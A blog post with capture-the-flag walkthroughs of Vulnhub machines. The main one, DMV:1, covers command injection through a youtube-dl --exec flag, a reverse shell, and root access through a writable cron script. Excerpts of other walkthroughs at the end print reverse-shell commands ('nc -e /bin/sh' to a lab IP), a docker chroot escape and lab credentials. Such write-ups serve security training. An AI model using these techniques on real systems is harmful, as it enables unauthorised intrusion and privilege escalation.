DMV:1 - Walkthrough [Vulnhub]

Here's my solution for DMV:1
The machine can be downloaded from here.

Nmap
Scanning for all TCP ports.
$ nmap -sC -sV -p- 192.168.1.104


We find 2 ports open.

Enumeration
Since port 80 (HTTP) is open, let us browse the web.

Observing the web page, seems like it converts the youtube video to mp3 file.
Why not provide any randon value and check.


On the other hand we scan for directories using dirb.
$ dirb http://192.168.1.104/ -r


Interesting, browsing /admin, ask for authentication. At this point tried brute-forcing the password with default user as admin. But no result.

We browse the main page again, provide randon value and intercept the request. And check the request and response.


We see an error in reponse, we can easily search for the error to get an idea what it is all about or related with. 

While searching about the error we came across this github page, after going through it we navigated to code section from issues section.

We can see the source code of the application which is written in python.

We go through the documentation and check the list of available flags.

Let us put the value as- --help, and check the response.
And we see that its working file.


Lets us try one more time with other flag (--version).

Seems its working absolutely fine.
As we have a flag --exec, which executes a command, we try it.

We try to execute, id command, but did not get the expected output.

By using the special character less than symbol (<) and backtick (`) we are able to execute the command successfully.

We try to execte the ls -la command, but did not work. Seems to be an issue with space.

After some searches we firgured out a way. We replace the space with ${IFS}.
And this time we are able to execute the command successfully.

Getting Access
Now we upload the python reverse shell using netcat.


 



On the other hand we start the netcat listener.



We successfully get the reverse shell.

User Flag.
We get the flag under /var/www/html/admin directory.



Privilege Escalation
We transfer pspy32 on the target machine under /tmp directory.

We give full permission to the file, and we execute it. Observering the output we find that a file named- check.sh, runs as root every 1 minute.

We navigate to directory- /var/www/html/tmp where the file- check.sh is located.


We simply place the bash reverse shell payload in file and on the other hand we start the netcat listener.


We know that the file runs every 1 minute, we wait for a minute and we get the reverse shell succesfully.

Root Flag.


 

Comments

Post a Comment

Popular posts from this blog

Sunset:Noontide - Walkthrough [Vulnhub]

Image
Here's my solution for Sunset:Noontide. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.109 We find 3 ports (UnrealIRCd) open. Enumeration We search the exploit for UnrealIRCd and we find it here.     Getting Access To exploit we simply run the nmap command with the reverse shell payload and on the other hand we start the netcat listener. $ nmap -d -p6667 --script=irc-unrealircd-backdoor.nse --script-args=irc-unrealircd-backdoor.command='nc -e /bin/sh 192.168.1.108 1234' 192.168.1.109 We get the reverse shell. User Flag. Privilege Escalation We find that user- root has the default password- root. Lets switch to user- root and get the root flag. $ su root Password: root  
Read more

CyberSploit:2 - Walkthrough [Vulnhub]

Image
Here's my solution for CyberSploit:2. The Machine can be downloaded from here Nmap Starting with nmap scanning for all TCP open ports. nmap -sC -sV -p- 192.168.1.103 We find only 2 open ports. Enumeration Browsing the website, show list of usernames and passwords. Checking the source code reveal us a hint- ROT47. While browsing the website, we see a strange username- D92:=6?5C2 and its associated password as- 4J36CDA=@:E` From the hint we can guess that the username and password can be ROT47 encoded. Browsed Decode.fr to decode it, and we get the credentials as- username: shailendra password: cybersploit1 Getting Access Tried ssh with credential, and we get the access. ssh shailendra@192.168.1.1 password: cybersploit1 Found a file named as hint.txt, which gives a hint as docker, it can be used for privilege escalation, also the user is a member of docker group. Privilege Escalation docker run -v /:/mnt --rm -it alpine chroot /mnt sh And we get the flag
Read more

BBS(cute):1.0.1 - Walkthrough [Vulnhub]

Image
Here's my solution for BBS(cute):1.0.1. The machine can be downloaded from here. Nmap Scanning for all TCP ports. $ nmap -sC -sV -p- 192.168.1.111 We find 5 ports open. Enumeration Browsing the web hosted on port 80 (Default HTTP Port). We do not find any useful information lets run the dirb for scanning directories. $ dirb http://192.168.1.111 -r Browsing /index.php We see that it is built on CMS- CuteNews and its version 2.1.2 We search for the exploit and found it here.   Lets get this exploit. Getting Access But before running the exploit we need to make some changes. We remove all /CuteNews from the exploit code, in order to run it successfully. Done with the changes, now we run the exploit. $ python3 48800.py We provide the required information that is, the URL and hit enter. The commands are running fine, but we are not able to navigate to different directories, hence we try to get the normal reverse shell. We see netcat is present, we enter the payload. $ nc -e /bin/bash 19...
Read more